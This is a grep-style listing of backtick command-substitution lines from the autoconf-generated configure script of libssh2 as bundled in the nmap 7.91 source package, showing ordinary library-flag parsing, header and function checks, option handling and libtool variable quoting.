nmap-7.91+dfsg1/libssh2/configure:16280:                    additional_libdir=`echo "X$dep" | sed -e 's/^X-L//'`
nmap-7.91+dfsg1/libssh2/configure-16281-                                                                                                                                                                if test "X$additional_libdir" != "X/usr/$acl_libdirstem"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-16336-                  -R*)
nmap-7.91+dfsg1/libssh2/configure:16337:                    dir=`echo "X$dep" | sed -e 's/^X-R//'`
nmap-7.91+dfsg1/libssh2/configure-16338-                    if test "$enable_rpath" != no; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-16361-                  -l*)
nmap-7.91+dfsg1/libssh2/configure:16362:                                        names_next_round="$names_next_round "`echo "X$dep" | sed -e 's/^X-l//'`
nmap-7.91+dfsg1/libssh2/configure-16363-                    ;;
nmap-7.91+dfsg1/libssh2/configure-16364-                  *.la)
nmap-7.91+dfsg1/libssh2/configure:16365:                                                                                names_next_round="$names_next_round "`echo "X$dep" | sed -e 's,^X.*/,,' -e 's,^lib,,' -e 's,\.la$,,'`
nmap-7.91+dfsg1/libssh2/configure-16366-                    ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-16581-        names_already_handled="$names_already_handled $name"
nmap-7.91+dfsg1/libssh2/configure:16582:                        uppername=`echo "$name" | sed -e 'y|abcdefghijklmnopqrstuvwxyz./-|ABCDEFGHIJKLMNOPQRSTUVWXYZ___|'`
nmap-7.91+dfsg1/libssh2/configure-16583-        eval value=\"\$HAVE_LIB$uppername\"
##############################################
nmap-7.91+dfsg1/libssh2/configure-16657-                -L*)
nmap-7.91+dfsg1/libssh2/configure:16658:                  dir=`echo "X$x" | sed -e 's/^X-L//'`
nmap-7.91+dfsg1/libssh2/configure-16659-                                    if test -n "$acl_shlibext"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-16772-              */$acl_libdirstem | */$acl_libdirstem/)
nmap-7.91+dfsg1/libssh2/configure:16773:                basedir=`echo "X$found_dir" | sed -e 's,^X,,' -e "s,/$acl_libdirstem/"'*$,,'`
nmap-7.91+dfsg1/libssh2/configure-16774-                LIBBCRYPT_PREFIX="$basedir"
##############################################
nmap-7.91+dfsg1/libssh2/configure-16821-                  -L*)
nmap-7.91+dfsg1/libssh2/configure:16822:                    additional_libdir=`echo "X$dep" | sed -e 's/^X-L//'`
nmap-7.91+dfsg1/libssh2/configure-16823-                                                                                                                                                                if test "X$additional_libdir" != "X/usr/$acl_libdirstem"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-16878-                  -R*)
nmap-7.91+dfsg1/libssh2/configure:16879:                    dir=`echo "X$dep" | sed -e 's/^X-R//'`
nmap-7.91+dfsg1/libssh2/configure-16880-                    if test "$enable_rpath" != no; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-16903-                  -l*)
nmap-7.91+dfsg1/libssh2/configure:16904:                                        names_next_round="$names_next_round "`echo "X$dep" | sed -e 's/^X-l//'`
nmap-7.91+dfsg1/libssh2/configure-16905-                    ;;
nmap-7.91+dfsg1/libssh2/configure-16906-                  *.la)
nmap-7.91+dfsg1/libssh2/configure:16907:                                                                                names_next_round="$names_next_round "`echo "X$dep" | sed -e 's,^X.*/,,' -e 's,^lib,,' -e 's,\.la$,,'`
nmap-7.91+dfsg1/libssh2/configure-16908-                    ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-17198-        names_already_handled="$names_already_handled $name"
nmap-7.91+dfsg1/libssh2/configure:17199:                        uppername=`echo "$name" | sed -e 'y|abcdefghijklmnopqrstuvwxyz./-|ABCDEFGHIJKLMNOPQRSTUVWXYZ___|'`
nmap-7.91+dfsg1/libssh2/configure-17200-        eval value=\"\$HAVE_LIB$uppername\"
##############################################
nmap-7.91+dfsg1/libssh2/configure-17274-                -L*)
nmap-7.91+dfsg1/libssh2/configure:17275:                  dir=`echo "X$x" | sed -e 's/^X-L//'`
nmap-7.91+dfsg1/libssh2/configure-17276-                                    if test -n "$acl_shlibext"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-17389-              */$acl_libdirstem | */$acl_libdirstem/)
nmap-7.91+dfsg1/libssh2/configure:17390:                basedir=`echo "X$found_dir" | sed -e 's,^X,,' -e "s,/$acl_libdirstem/"'*$,,'`
nmap-7.91+dfsg1/libssh2/configure-17391-                LIBZ_PREFIX="$basedir"
##############################################
nmap-7.91+dfsg1/libssh2/configure-17438-                  -L*)
nmap-7.91+dfsg1/libssh2/configure:17439:                    additional_libdir=`echo "X$dep" | sed -e 's/^X-L//'`
nmap-7.91+dfsg1/libssh2/configure-17440-                                                                                                                                                                if test "X$additional_libdir" != "X/usr/$acl_libdirstem"; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-17495-                  -R*)
nmap-7.91+dfsg1/libssh2/configure:17496:                    dir=`echo "X$dep" | sed -e 's/^X-R//'`
nmap-7.91+dfsg1/libssh2/configure-17497-                    if test "$enable_rpath" != no; then
##############################################
nmap-7.91+dfsg1/libssh2/configure-17520-                  -l*)
nmap-7.91+dfsg1/libssh2/configure:17521:                                        names_next_round="$names_next_round "`echo "X$dep" | sed -e 's/^X-l//'`
nmap-7.91+dfsg1/libssh2/configure-17522-                    ;;
nmap-7.91+dfsg1/libssh2/configure-17523-                  *.la)
nmap-7.91+dfsg1/libssh2/configure:17524:                                                                                names_next_round="$names_next_round "`echo "X$dep" | sed -e 's,^X.*/,,' -e 's,^lib,,' -e 's,\.la$,,'`
nmap-7.91+dfsg1/libssh2/configure-17525-                    ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-17781-$as_echo_n "checking gcc version... " >&6; }
nmap-7.91+dfsg1/libssh2/configure:17782:       gccver=`$CC -dumpversion`
nmap-7.91+dfsg1/libssh2/configure:17783:       num1=`echo $gccver | cut -d . -f1`
nmap-7.91+dfsg1/libssh2/configure:17784:       num2=`echo $gccver | cut -d . -f2`
nmap-7.91+dfsg1/libssh2/configure:17785:       gccnum=`(expr $num1 "*" 100 + $num2) 2>/dev/null`
nmap-7.91+dfsg1/libssh2/configure-17786-       { $as_echo "$as_me:${as_lineno-$LINENO}: result: $gccver" >&5
##############################################
nmap-7.91+dfsg1/libssh2/configure-17828-            -I*)
nmap-7.91+dfsg1/libssh2/configure:17829:                                                        add=`echo $flag | sed 's/^-I/-isystem /g'`
nmap-7.91+dfsg1/libssh2/configure-17830-              WARN="$WARN $add"
##############################################
nmap-7.91+dfsg1/libssh2/configure-17920-do :
nmap-7.91+dfsg1/libssh2/configure:17921:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/libssh2/configure-17922-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/libssh2/configure-17924-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/libssh2/configure:17925:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/libssh2/configure-17926-_ACEOF
##############################################
nmap-7.91+dfsg1/libssh2/configure-17933-do :
nmap-7.91+dfsg1/libssh2/configure:17934:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/libssh2/configure-17935-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/libssh2/configure-17937-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/libssh2/configure:17938:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/libssh2/configure-17939-_ACEOF
##############################################
nmap-7.91+dfsg1/libssh2/configure-17946-do :
nmap-7.91+dfsg1/libssh2/configure:17947:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/libssh2/configure-17948-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/libssh2/configure-17950-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/libssh2/configure:17951:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/libssh2/configure-17952-_ACEOF
##############################################
nmap-7.91+dfsg1/libssh2/configure-17987-do :
nmap-7.91+dfsg1/libssh2/configure:17988:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/libssh2/configure-17989-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/libssh2/configure-17991-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/libssh2/configure:17992:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/libssh2/configure-17993-_ACEOF
##############################################
nmap-7.91+dfsg1/libssh2/configure-18023-do :
nmap-7.91+dfsg1/libssh2/configure:18024:  as_ac_var=`$as_echo "ac_cv_func_$ac_func" | $as_tr_sh`
nmap-7.91+dfsg1/libssh2/configure-18025-ac_fn_c_check_func "$LINENO" "$ac_func" "$as_ac_var"
##############################################
nmap-7.91+dfsg1/libssh2/configure-18027-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/libssh2/configure:18028:#define `$as_echo "HAVE_$ac_func" | $as_tr_cpp` 1
nmap-7.91+dfsg1/libssh2/configure-18029-_ACEOF
##############################################
nmap-7.91+dfsg1/libssh2/configure-18214-  for ac_func in _getb67 GETB67 getb67; do
nmap-7.91+dfsg1/libssh2/configure:18215:    as_ac_var=`$as_echo "ac_cv_func_$ac_func" | $as_tr_sh`
nmap-7.91+dfsg1/libssh2/configure-18216-ac_fn_c_check_func "$LINENO" "$ac_func" "$as_ac_var"
##############################################
nmap-7.91+dfsg1/libssh2/configure-18757-  ac_script='s/\$U\././;s/\.o$//;s/\.obj$//'
nmap-7.91+dfsg1/libssh2/configure:18758:  ac_i=`$as_echo "$ac_i" | sed "$ac_script"`
nmap-7.91+dfsg1/libssh2/configure-18759-  # 2. Prepend LIBOBJDIR.  When used with automake>=1.10 LIBOBJDIR
##############################################
nmap-7.91+dfsg1/libssh2/configure-18881-if test -z "$BASH_VERSION$ZSH_VERSION" \
nmap-7.91+dfsg1/libssh2/configure:18882:    && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/libssh2/configure-18883-  as_echo='print -r --'
nmap-7.91+dfsg1/libssh2/configure-18884-  as_echo_n='print -rn --'
nmap-7.91+dfsg1/libssh2/configure:18885:elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/libssh2/configure-18886-  as_echo='printf %s\n'
##############################################
nmap-7.91+dfsg1/libssh2/configure-18888-else
nmap-7.91+dfsg1/libssh2/configure:18889:  if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then
nmap-7.91+dfsg1/libssh2/configure-18890-    as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"'
##############################################
nmap-7.91+dfsg1/libssh2/configure-18898-	expr "X$arg" : "X\\(.*\\)$as_nl";
nmap-7.91+dfsg1/libssh2/configure:18899:	arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;;
nmap-7.91+dfsg1/libssh2/configure-18900-      esac;
##############################################
nmap-7.91+dfsg1/libssh2/configure-18975-# ----------------------------------------
nmap-7.91+dfsg1/libssh2/configure:18976:# Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are
nmap-7.91+dfsg1/libssh2/configure-18977-# provided, also output the error to LOG_FD, referencing LINENO. Then exit the
##############################################
nmap-7.91+dfsg1/libssh2/configure-19047-  {
nmap-7.91+dfsg1/libssh2/configure:19048:    as_val=`expr "$@" || test $? -eq 1`
nmap-7.91+dfsg1/libssh2/configure-19049-  }
##############################################
nmap-7.91+dfsg1/libssh2/configure-19151-      case $as_dir in #(
nmap-7.91+dfsg1/libssh2/configure:19152:      *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'(
nmap-7.91+dfsg1/libssh2/configure-19153-      *) as_qdir=$as_dir;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-19286-cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1
nmap-7.91+dfsg1/libssh2/configure:19287:ac_cs_config="`$as_echo "$ac_configure_args" | sed 's/^ //; s/[\\""\`\$]/\\\\&/g'`"
nmap-7.91+dfsg1/libssh2/configure-19288-ac_cs_version="\\
##############################################
nmap-7.91+dfsg1/libssh2/configure-19311-  --*=?*)
nmap-7.91+dfsg1/libssh2/configure:19312:    ac_option=`expr "X$1" : 'X\([^=]*\)='`
nmap-7.91+dfsg1/libssh2/configure:19313:    ac_optarg=`expr "X$1" : 'X[^=]*=\(.*\)'`
nmap-7.91+dfsg1/libssh2/configure-19314-    ac_shift=:
##############################################
nmap-7.91+dfsg1/libssh2/configure-19316-  --*=)
nmap-7.91+dfsg1/libssh2/configure:19317:    ac_option=`expr "X$1" : 'X\([^=]*\)='`
nmap-7.91+dfsg1/libssh2/configure-19318-    ac_optarg=
##############################################
nmap-7.91+dfsg1/libssh2/configure-19340-    case $ac_optarg in
nmap-7.91+dfsg1/libssh2/configure:19341:    *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/libssh2/configure-19342-    '') as_fn_error $? "missing file argument" ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-19348-    case $ac_optarg in
nmap-7.91+dfsg1/libssh2/configure:19349:    *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/libssh2/configure-19350-    esac
##############################################
nmap-7.91+dfsg1/libssh2/configure-19417-delay_variable_subst='$delay_variable_subst'
nmap-7.91+dfsg1/libssh2/configure:19418:AS='`$ECHO "$AS" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19419:DLLTOOL='`$ECHO "$DLLTOOL" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19420:OBJDUMP='`$ECHO "$OBJDUMP" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19421:macro_version='`$ECHO "$macro_version" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19422:macro_revision='`$ECHO "$macro_revision" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19423:enable_shared='`$ECHO "$enable_shared" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19424:enable_static='`$ECHO "$enable_static" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19425:pic_mode='`$ECHO "$pic_mode" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19426:enable_fast_install='`$ECHO "$enable_fast_install" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19427:shared_archive_member_spec='`$ECHO "$shared_archive_member_spec" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19428:SHELL='`$ECHO "$SHELL" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19429:ECHO='`$ECHO "$ECHO" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19430:PATH_SEPARATOR='`$ECHO "$PATH_SEPARATOR" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19431:host_alias='`$ECHO "$host_alias" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19432:host='`$ECHO "$host" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19433:host_os='`$ECHO "$host_os" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19434:build_alias='`$ECHO "$build_alias" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19435:build='`$ECHO "$build" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19436:build_os='`$ECHO "$build_os" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19437:SED='`$ECHO "$SED" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19438:Xsed='`$ECHO "$Xsed" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19439:GREP='`$ECHO "$GREP" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19440:EGREP='`$ECHO "$EGREP" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19441:FGREP='`$ECHO "$FGREP" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19442:LD='`$ECHO "$LD" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19443:NM='`$ECHO "$NM" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19444:LN_S='`$ECHO "$LN_S" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19445:max_cmd_len='`$ECHO "$max_cmd_len" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19446:ac_objext='`$ECHO "$ac_objext" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19447:exeext='`$ECHO "$exeext" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19448:lt_unset='`$ECHO "$lt_unset" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19449:lt_SP2NL='`$ECHO "$lt_SP2NL" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19450:lt_NL2SP='`$ECHO "$lt_NL2SP" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19451:lt_cv_to_host_file_cmd='`$ECHO "$lt_cv_to_host_file_cmd" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19452:lt_cv_to_tool_file_cmd='`$ECHO "$lt_cv_to_tool_file_cmd" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19453:reload_flag='`$ECHO "$reload_flag" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19454:reload_cmds='`$ECHO "$reload_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19455:deplibs_check_method='`$ECHO "$deplibs_check_method" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19456:file_magic_cmd='`$ECHO "$file_magic_cmd" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19457:file_magic_glob='`$ECHO "$file_magic_glob" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19458:want_nocaseglob='`$ECHO "$want_nocaseglob" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19459:sharedlib_from_linklib_cmd='`$ECHO "$sharedlib_from_linklib_cmd" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19460:AR='`$ECHO "$AR" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19461:AR_FLAGS='`$ECHO "$AR_FLAGS" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19462:archiver_list_spec='`$ECHO "$archiver_list_spec" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19463:STRIP='`$ECHO "$STRIP" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19464:RANLIB='`$ECHO "$RANLIB" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19465:old_postinstall_cmds='`$ECHO "$old_postinstall_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19466:old_postuninstall_cmds='`$ECHO "$old_postuninstall_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19467:old_archive_cmds='`$ECHO "$old_archive_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19468:lock_old_archive_extraction='`$ECHO "$lock_old_archive_extraction" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19469:CC='`$ECHO "$CC" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19470:CFLAGS='`$ECHO "$CFLAGS" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19471:compiler='`$ECHO "$compiler" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19472:GCC='`$ECHO "$GCC" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19473:lt_cv_sys_global_symbol_pipe='`$ECHO "$lt_cv_sys_global_symbol_pipe" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19474:lt_cv_sys_global_symbol_to_cdecl='`$ECHO "$lt_cv_sys_global_symbol_to_cdecl" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19475:lt_cv_sys_global_symbol_to_import='`$ECHO "$lt_cv_sys_global_symbol_to_import" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19476:lt_cv_sys_global_symbol_to_c_name_address='`$ECHO "$lt_cv_sys_global_symbol_to_c_name_address" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19477:lt_cv_sys_global_symbol_to_c_name_address_lib_prefix='`$ECHO "$lt_cv_sys_global_symbol_to_c_name_address_lib_prefix" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19478:lt_cv_nm_interface='`$ECHO "$lt_cv_nm_interface" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19479:nm_file_list_spec='`$ECHO "$nm_file_list_spec" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19480:lt_sysroot='`$ECHO "$lt_sysroot" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19481:lt_cv_truncate_bin='`$ECHO "$lt_cv_truncate_bin" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19482:objdir='`$ECHO "$objdir" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19483:MAGIC_CMD='`$ECHO "$MAGIC_CMD" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19484:lt_prog_compiler_no_builtin_flag='`$ECHO "$lt_prog_compiler_no_builtin_flag" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19485:lt_prog_compiler_pic='`$ECHO "$lt_prog_compiler_pic" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19486:lt_prog_compiler_wl='`$ECHO "$lt_prog_compiler_wl" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19487:lt_prog_compiler_static='`$ECHO "$lt_prog_compiler_static" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19488:lt_cv_prog_compiler_c_o='`$ECHO "$lt_cv_prog_compiler_c_o" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19489:need_locks='`$ECHO "$need_locks" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19490:MANIFEST_TOOL='`$ECHO "$MANIFEST_TOOL" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19491:DSYMUTIL='`$ECHO "$DSYMUTIL" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19492:NMEDIT='`$ECHO "$NMEDIT" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19493:LIPO='`$ECHO "$LIPO" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19494:OTOOL='`$ECHO "$OTOOL" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19495:OTOOL64='`$ECHO "$OTOOL64" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19496:libext='`$ECHO "$libext" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19497:shrext_cmds='`$ECHO "$shrext_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19498:extract_expsyms_cmds='`$ECHO "$extract_expsyms_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19499:archive_cmds_need_lc='`$ECHO "$archive_cmds_need_lc" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19500:enable_shared_with_static_runtimes='`$ECHO "$enable_shared_with_static_runtimes" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19501:export_dynamic_flag_spec='`$ECHO "$export_dynamic_flag_spec" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19502:whole_archive_flag_spec='`$ECHO "$whole_archive_flag_spec" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19503:compiler_needs_object='`$ECHO "$compiler_needs_object" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19504:old_archive_from_new_cmds='`$ECHO "$old_archive_from_new_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19505:old_archive_from_expsyms_cmds='`$ECHO "$old_archive_from_expsyms_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19506:archive_cmds='`$ECHO "$archive_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19507:archive_expsym_cmds='`$ECHO "$archive_expsym_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19508:module_cmds='`$ECHO "$module_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19509:module_expsym_cmds='`$ECHO "$module_expsym_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19510:with_gnu_ld='`$ECHO "$with_gnu_ld" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19511:allow_undefined_flag='`$ECHO "$allow_undefined_flag" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19512:no_undefined_flag='`$ECHO "$no_undefined_flag" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19513:hardcode_libdir_flag_spec='`$ECHO "$hardcode_libdir_flag_spec" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19514:hardcode_libdir_separator='`$ECHO "$hardcode_libdir_separator" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19515:hardcode_direct='`$ECHO "$hardcode_direct" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19516:hardcode_direct_absolute='`$ECHO "$hardcode_direct_absolute" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19517:hardcode_minus_L='`$ECHO "$hardcode_minus_L" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19518:hardcode_shlibpath_var='`$ECHO "$hardcode_shlibpath_var" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19519:hardcode_automatic='`$ECHO "$hardcode_automatic" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19520:inherit_rpath='`$ECHO "$inherit_rpath" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19521:link_all_deplibs='`$ECHO "$link_all_deplibs" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19522:always_export_symbols='`$ECHO "$always_export_symbols" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19523:export_symbols_cmds='`$ECHO "$export_symbols_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19524:exclude_expsyms='`$ECHO "$exclude_expsyms" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19525:include_expsyms='`$ECHO "$include_expsyms" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19526:prelink_cmds='`$ECHO "$prelink_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19527:postlink_cmds='`$ECHO "$postlink_cmds" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19528:file_list_spec='`$ECHO "$file_list_spec" | $SED "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libssh2/configure:19529:variables_saved_for_relink='`$ECHO "$variables_saved_for_relink" | $SED "$delay_single_quote_subst"`'
